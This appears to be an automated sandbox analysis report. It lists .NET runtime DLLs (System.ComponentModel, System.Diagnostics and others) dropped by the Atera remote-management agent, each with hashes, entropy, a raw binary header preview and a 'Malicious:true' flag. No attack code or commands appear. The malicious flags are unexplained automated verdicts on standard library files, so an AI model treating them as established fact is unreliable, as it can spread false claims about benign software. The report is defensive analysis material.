                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0..............*... ...@....... ...............................x....@..................................*..O....@..................((...`......L)............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P ..|....................(......................................BSJB............v4.0.30319......l.......#~..|.......#Strings....\.......#US.`.......#GUID...p.......#Blob......................3................................................k.~.....~.....k...........*...0.*...M.*.....*.....*.....*.....*.....*.....#.....*.....x...........e.....e.....e...).e...1.e...9.e...A.e...I.e...Q.e...Y.e...a.e...i.e...q.e.......................#.....+.....3.....;.....C./...K.O...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.EventBasedAsync.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15912
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.8111682906136926
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:onzz+MpSaLWW0+WCANyb8E9VF6IYijSJIVx1JHtZ:mpui4EpYi607NZ
                                                                                                                                                                                                                                                                                              MD5:A380572A319B32A3B1D2D2D2C198E86F
                                                                                                                                                                                                                                                                                              SHA1:978096C136F070F4D628E7969BF03110275C3E34
                                                                                                                                                                                                                                                                                              SHA-256:2B8D11EC79CA4F85DB4AB9FDD54B13764006051CF6D212B726F15C798A723F9F
                                                                                                                                                                                                                                                                                              SHA-512:34B10A058B1EF692134C37EBE9337F5A1730B70C3153345CB9F9DB5E89F76FEE2FD8C3C129106A8730436C391ABA2D8B4C9F4AEB2B01F64DF2C540A0E0D69346
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............B*... ...@....... ....................................@..................................)..O....@..................((...`.......(............................................... ............... ..H............text...H.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................$*......H.......P ......................8(......................................BSJB............v4.0.30319......l.......#~..t...@...#Strings............#US.........#GUID....... ...#Blob......................3............................................................V...........j.................i...........8.................S.....<...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.'...C.B...K.b...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.Primitives.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15912
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.859379458293653
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:gGhr+YUfyHxsW/HW5zNyb8E9VF6IYijSJIVxVUlNb8:XkmcvEpYi60yb8
                                                                                                                                                                                                                                                                                              MD5:4D36FD75A70633F10124CCF793AE139C
                                                                                                                                                                                                                                                                                              SHA1:DDBBEDCA52929A9DCFCAB83D39897B092F8BBCE4
                                                                                                                                                                                                                                                                                              SHA-256:652F384CDBE805992817D54B5FA1B2C680367E0D8C49AEE3C72024C9803ADD66
                                                                                                                                                                                                                                                                                              SHA-512:32905A1EF9AE27309932673DC0BEEC9A93EBA9DD202A8187C1614EE1AEB8B4F93133985F52D60801189130684D49C507455C7AB59DA2FEC31B4177EFD619DA80
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............+... ...@....... ...................................@.................................<+..O....@..`...............((...`.......*............................................... ............... ..H............text........ ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B................p+......H.......P ..4....................)......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob......................3................................................Y.]...{.]...6.J...}.....r........... .............................................................D.....D.....D...).D...1.D...9.D...A.D...I.D...Q.D...Y.D...a.D...i.D...q.D.......................#.....+.....3.....;."...C.=...K.]...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.TypeConverter.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16936
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.785283839401024
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:GRE+ruiA5vzWeNWdSNyb8E9VF6IYijSJIVx4XyHyT:GS9b2yEpYi60YMyT
                                                                                                                                                                                                                                                                                              MD5:6328ADD138DF8C29E75BC14F5D2120CF
                                                                                                                                                                                                                                                                                              SHA1:9E1E01B0FB0EA37CE687EF3E1A4FC267F303DBC3
                                                                                                                                                                                                                                                                                              SHA-256:2635E454447F993496F17722DF0133AAE4BD957F8D15AD759256D55C45B2D9FB
                                                                                                                                                                                                                                                                                              SHA-512:7A69AED46E057318D88CDCDD457C0DAD8EEE58013B44A5C5CA1BACB78CB7AE3DE753D3901C1386476D3C01D4E5965822BC24415BAA6FA5E08D2B2C403964528E
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0............../... ...@....... ....................................@................................../..O....@..p...............((...`......T................................................ ............... ..H............text........ ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B................./......H.......P .......................-......................................BSJB............v4.0.30319......l.......#~......@...#Strings....T.......#US.X.......#GUID...h.......#Blob......................3................................;.....Y.........8...........<...........P.......................X.....q.....g................."...................I.....I.....I...).I...1.I...9.I...A.I...I.I...Q.I...Y.I...a.I...i.I...q.I.......................#.....+.....3.....;.%...C.@...K.`...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.849856881849517
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:pT+6ywnVvW0LW5SNyb8E9VF6IYijSJIVxcWfnt:p998yEpYi60Jnt
                                                                                                                                                                                                                                                                                              MD5:A4A7F63BFEF46103347EFA5C1F23A84F
                                                                                                                                                                                                                                                                                              SHA1:8947AF46ACFE76152410E3086D7595DC84C1EDDD
                                                                                                                                                                                                                                                                                              SHA-256:3B1E09BB2A59E8EC4251973E8A58DDB993EDAAB976914F9FB09DC32D77B4F9BF
                                                                                                                                                                                                                                                                                              SHA-512:BB71DDE1B6C464828B7FF6095B7F0FCCECF15AC04249DA43C1C57155E1800BCAFADA758E1097D45CB2DE3E5BA82F6F59B74D0C0AFA683935CA37D4B638DD115D
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ....................................@..................................(..O....@..................((...`......|'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~.. ...h...#Strings............#US.........#GUID...........#Blob......................3......................................................\.....0.....7.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.2...K.R...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Console.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.848390763178357
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:XRbzriaXT+WlEWe5Nyb8E9VF6IYijSJIVxri+t1sD:B7icodEpYi60u8y
                                                                                                                                                                                                                                                                                              MD5:A0700CED3A42A611A476CF0289F86986
                                                                                                                                                                                                                                                                                              SHA1:D4352EBDBDDDA7BD594AA61E5EDE7DA19311C6A9
                                                                                                                                                                                                                                                                                              SHA-256:662D9B458771B5948EB4D1BB1C382B9D9D442877261A26EA83F43FAFBDCA72FE
                                                                                                                                                                                                                                                                                              SHA-512:928AB8830ABB0A389F6863125FEFBE418001A27DA25F277EEDAC99218201DEB659E8B8D82761B5418947E847E6D446288EDA6B09CD51FC41C8C16355149F0DA5
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............6)... ...@....... ..............................'.....@..................................(..O....@..................((...`.......'............................................... ............... ..H............text...<.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P ......................,'......................................BSJB............v4.0.30319......l.......#~..H...x...#Strings............#US.........#GUID...........#Blob......................3......................................................k.....?.....$.....S.................R...........!.....j...........<.....%...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.+...K.K...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Data.Common.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):148520
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.418180901091705
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:1dYO+3m9R6e1x03BZ6bDSzZ8B0uAP+CSE:j+2jv1x0ebezWiu8
                                                                                                                                                                                                                                                                                              MD5:F204707F338F6C7819482922C0958D10
                                                                                                                                                                                                                                                                                              SHA1:4EC0D04FD7E2B8834A6AE96A2380F97965562E1A
                                                                                                                                                                                                                                                                                              SHA-256:1379BE52E32EAD9795E1F3270B91A29119B59BC7DF16F3B9BD1A0E00954FC10D
                                                                                                                                                                                                                                                                                              SHA-512:68888BA7746EAAAEC6C0AD64B5A8B0EC27547E0A40B98A34109ABA051BEE07082C5359D9E22078E4D0D01B7F09C1075A0F21CC749A465EACC58BD90338FD5297
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............,... ...@....... ...............................&....@..................................,..O....@..................((...`.......+............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................,......H........A...............?..h...t+......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*2r;..p.(....*2ro..p.(....*2r...p.(....*2r...p.(....*2r...p.(....*2rK..p.(....*2r...p.(....*2r...p.(....*2r...p.(....*2rM..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Contracts.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15912
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.810928431259459
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:XRtRWjYWw9Nyb8E9VF6IYijSJIVxIRMki:nie5EpYi60z
                                                                                                                                                                                                                                                                                              MD5:3C52E43E526A4DDEA7E21D3F6CB0934C
                                                                                                                                                                                                                                                                                              SHA1:48B0A29FC2CBB6E66414D44FE0D36E02A61B501B
                                                                                                                                                                                                                                                                                              SHA-256:12545A778E40FAC4A5842D56E9C5571B7BA370B2A04883A82C1C86C3979F78C3
                                                                                                                                                                                                                                                                                              SHA-512:7F0EBD61CE00268436845C4C513BE19E7311CFDDA5AD90CB6AF6F4274D865649C437240961415DADEB0178E5A26DB2F8B7F8943BAB5ABEDE833F3DCD86E166D6
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............*... ...@....... ..............................p.....@.................................x*..O....@..@...............((...`......@)............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................*......H.......P ..p....................(......................................BSJB............v4.0.30319......l...@...#~..........#Strings....H.......#US.L.......#GUID...\.......#Blob......................3..................................................-.....-.........M...........[.................'.....@.................[.....*...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.9...K.Y...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Debug.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.890844337955829
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:nFxrIFWnoW5BPrNyby2sE9jBF6IYiYF85S35IVnxGUHFK1+Jm5RmP:veWnoW7zNyb8E9VF6IYijSJIVxG1+MbU
                                                                                                                                                                                                                                                                                              MD5:039CC956B7A5891ECC3799D805EBF444
                                                                                                                                                                                                                                                                                              SHA1:6F13A284F49B152F14ED6C23E41A4550CCEBD841
                                                                                                                                                                                                                                                                                              SHA-256:E679990416DF09D59345F070E659D13D3F8424FD04642D993989511BB188F7FB
                                                                                                                                                                                                                                                                                              SHA-512:2B23E0B70F345BE16D828537BCE22113DF136DA76F23B1227D11AEE653D5D73FB5CB87FACE86CB378F1C9CCAD564F1BF351C522F719716B02772389073CB64F4
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ...............................:....@.................................X)..O....@..$...............((...`...... (............................................... ............... ..H............text........ ...................... ..`.rsrc...$....@......................@..@.reloc.......`......................@..B.................)......H.......P ..P....................'......................................BSJB............v4.0.30319......l.......#~..X.......#Strings....,.......#US.0.......#GUID...@.......#Blob......................3......................................K.........]...........d.............o...".o...?.o.....o...}.o.....o.....o.....o.....h...-.o.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.5...K.U...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.DiagnosticSource.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):99368
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.23639961491798
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:qnDoXrtUaK/XIg+rZAXj8s9HaWt9LuOw9VHHV55aTwWbaD763fJ:CitRK/XIgIZAXjD96WfLtGdM5baDC
                                                                                                                                                                                                                                                                                              MD5:4CBAE74F248C3612DED81C2750580F91
                                                                                                                                                                                                                                                                                              SHA1:6C0BE7421FDDEF471857829BEDB1E784C0876C95
                                                                                                                                                                                                                                                                                              SHA-256:090AE8D4CA0932EFDBA54F21062FEFF98AE780C849F28512EE70007521550EA6
                                                                                                                                                                                                                                                                                              SHA-512:ECA366B2A8C7918F4E165B21294929A5F4DC3A87593E43C6826C932F74DCCC4BF26BAE728CBCCAF3973E0ED47BC56A67DF8FF96D8EFE476830F4D73F7DF7D4F9
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v.#..........." ..0..R...........o... ........... ..............................n.....`..................................o..O....................\..((...........n..T............................................ ............... ..H............text....P... ...R.................. ..`.rsrc................T..............@..@.reloc...............Z..............@..B.................o......H.......4................e.. ....n........................................{'...*:.((.....}'...*..0..#........u......,.()....{'....{'...o*...*.*v ..yN )UU.Z()....{'...o+...X*....0..:........r...p......%..{'......%q.........-.&.+.......o,....(-...*..{....*:.((.....}....*....0..#........u......,.()....{.....{....o*...*.*v ..:. )UU.Z()....{....o+...X*....0..:........r-..p......%..{.......%q.........-.&.+.......o,....(-...*..{/...*..{0...*V.((.....}/.....}0...*.0..;........u......

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.FileVersionInfo.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.852040403345325
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:CxGxIZWJjW5bPfNyby2sE9jBF6IYiYF85S35IVnxGUHFykNoc0xPex:C6oWJjWN3Nyb8E9VF6IYijSJIVxukycJ
                                                                                                                                                                                                                                                                                              MD5:D917DEA96F5B910E68D1F79E37B2DD91
                                                                                                                                                                                                                                                                                              SHA1:24F89EED7B3DE4C5E5544F00C738DE7A1EDD9805
                                                                                                                                                                                                                                                                                              SHA-256:2FC20781034A391AC60F35C94B3DB22383B7BFD17430BECF43460321566B0500
                                                                                                                                                                                                                                                                                              SHA-512:BD575B68678242BFC301D77807507180477572F8A23BA6341E60B12322FB85776540939D156CBBEE0377F2108FACE44AFF45F74D51F97D78FB7B941B0DDC1A23
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ..............................R.....@.................................H(..O....@..p...............((...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B................|(......H.......P ..@....................&......................................BSJB............v4.0.30319......l...|...#~......(...#Strings............#US.........#GUID...$.......#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.$...C.?...K._...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Process.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15912
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.771448960937668
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:Cqk53/hW3fZ+zWqyNyb8E9VF6IYijSJIVxjpbu:Cqk53MmSEpYi60pu
                                                                                                                                                                                                                                                                                              MD5:7D50A7135BBAA5223A1F9295D134B3F5
                                                                                                                                                                                                                                                                                              SHA1:64EA8C06AC68779CE21B1E45ABAF0155FBCAFF74
                                                                                                                                                                                                                                                                                              SHA-256:14BB9215B0C82D2EABA0A76CC11B0E81D45426F43CE201F064137A182F174B68
                                                                                                                                                                                                                                                                                              SHA-512:DC2AC7152A217D438FE03749DFF22005E671ED633462CFD16D2EC2643FB4CD91D2C0890EAEA5954D704792BE227BFC072CCD0073FA147585EDC6BE21B4686FCD
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............**... ...@....... ....................................@..................................)..O....@..0...............((...`.......(............................................... ............... ..H............text...0.... ...................... ..`.rsrc...0....@......................@..@.reloc.......`......................@..B.................*......H.......P ...................... (......................................BSJB............v4.0.30319......l...$...#~..........#Strings............#US.........#GUID...........#Blob......................3............................................................j.q.........~.................}.....3.....L.................g.....P...................k.....k.....k...).k...1.k...9.k...A.k...I.k...Q.k...Y.k...a.k...i.k...q.k.......................#.....+.....3.....;.....C.7...K.W...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.StackTrace.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):17960
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.658255217483959
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:KFCc4Y4OJWfOWqWWOW7yNyb8E9VF6IYijSJIVxwOeQghm:6CcyCrSEpYi60Jj
                                                                                                                                                                                                                                                                                              MD5:541DD5FFC4E27C42B4510B20C7795763
                                                                                                                                                                                                                                                                                              SHA1:7A964AE8F8436D7D1B37774DE2CA0540B7785CB2
                                                                                                                                                                                                                                                                                              SHA-256:464341BE8209BE8A36F6FC5A1943408C3216F66D84D4410ED94689EFB1848920
                                                                                                                                                                                                                                                                                              SHA-512:F9690EB8C675829E194A0E8A4324843B683C28B4B3DE722C9099596202843161C98A013FE747A582C4EA47D72A5FB91DF7AC4548A393088B6F403A6B5338D6BF
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0.............N.... ...@....... ..............................).....@..................................-..O....@..................((...`......L-............................................... ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................0.......H........ ..4....................,......................................F.(....~....(....*6.o.....(....*6.o..........**.o.......*.~....*.~....*.BSJB............v4.0.30319......l.......#~..<.......#Strings.... .......#US.(.......#GUID...8.......#Blob...........GU.........3..................................................8.........*.h...m.h.....Z.....$...........Z...+.|.....Z...1.Z.....$.....$.......3.D.......|...F.|...c.|.....|.....|.....|.....|.....|.....Z...I.|...}.Z.....Z.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.TextWriterTraceListener.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.8738938766861075
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:dAWxMWxiNyb8E9VF6IYijSJIVxMPtrWU/w4:dvjiEpYi604rRY4
                                                                                                                                                                                                                                                                                              MD5:5C01326F7B286C2DBBECB385A53395EE
                                                                                                                                                                                                                                                                                              SHA1:DFEFC096F4DE4FAE01B4B7B19CC05AEF2283A59E
                                                                                                                                                                                                                                                                                              SHA-256:29A698BEEBD5BA52CC04FE7B7A22928E90E006A7885A1F10EB2E1A6665511F54
                                                                                                                                                                                                                                                                                              SHA-512:EAC153B33457347BA56CD53ECB11CEE297C503D792A6BC3DA8AF5BF8E2E4AE3D4356C460CD68F345E7EA673F37ACD847E8B623D03E416F80794C0BEED1FA066B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ..............................i.....@..................................(..O....@..................((...`......L'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P ..|....................&......................................BSJB............v4.0.30319......l.......#~......P...#Strings....D.......#US.H.......#GUID...X...$...#Blob......................3......................................z...........!...\.!...0.....A.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.,...C.G...K.g...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Tools.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.856217266564335
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:rYqArxbYWHaW5oPINyby2sE9jBF6IYiYF85S35IVnxGUHF2zfxGo6Dah:jAlcWHaWOQNyb8E9VF6IYijSJIVxyoLS
                                                                                                                                                                                                                                                                                              MD5:8EAF10A4BE6CF9FCFB560BE7BF63FBEB
                                                                                                                                                                                                                                                                                              SHA1:F20ABB136959EF3F40B82E712587983C13C8CF22
                                                                                                                                                                                                                                                                                              SHA-256:66A83605AF8E8462FAC61948656D7300C9EAD82CA230B0D45FA7AC81B2DE9124
                                                                                                                                                                                                                                                                                              SHA-512:588293D6043892C0DC1A46214BC4398E8C2513CB2C46B91CE9C996815083BFA25D9246089676F3ABA00F951B8A2937C1CBE83D808A72C49CB2B1FA71130CEEA7
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
